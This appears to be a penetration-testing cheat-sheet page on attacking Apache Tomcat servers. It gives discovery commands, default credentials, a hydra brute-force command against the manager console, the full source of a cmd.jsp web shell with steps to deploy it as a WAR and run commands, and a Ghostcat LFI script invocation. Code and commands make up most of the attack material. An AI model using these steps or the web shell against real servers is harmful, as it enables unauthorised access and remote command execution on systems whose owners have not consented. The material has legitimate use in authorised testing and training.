Web Server Attacks
Attacks on various servers like Apache, Nginx and Tomcat
Tomcat
Service Discovery
$ curl -s http://target/docs/ | grep Tomcat Generic structure of a Tomcat installation
โโโ bin
โโโ conf
โ โโโ catalina.policy
โ โโโ catalina.properties
โ โโโ context.xml
โ โโโ tomcat-users.xml <-- user credentials and roles
โ โโโ tomcat-users.xsd
โ โโโ web.xml
โโโ lib
โโโ logs
โโโ temp
โโโ webapps
โ โโโ manager
โ โ โโโ images
โ โ โโโ META-INF
โ โ โโโ WEB-INF
| | โโโ web.xml <-- describes routes and classes
โ โโโ ROOT
โ โโโ WEB-INF
โโโ work
โโโ Catalina
โโโ localhostImportant pages are /manger and /host-manager with default weak passwords like tomcat:tomcat or admin:admin
Bruteforcing
$ hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt -f site http-get manager/htmlWAR backdoor upload
After logging into the manager console, upload backdoor cmd.jsp
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>Upload the file
$ zip -r mybackdoor.war cmd.jsp Browse -> Deploy the war file, and execute commands with
$ curl http://target/mybackdoor/cmd.jsp?cmd=idGhostcat
LFI vulnerability that can only read files within the web apps folder, so it can't access /etc/passwd
$ python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xmlLast updated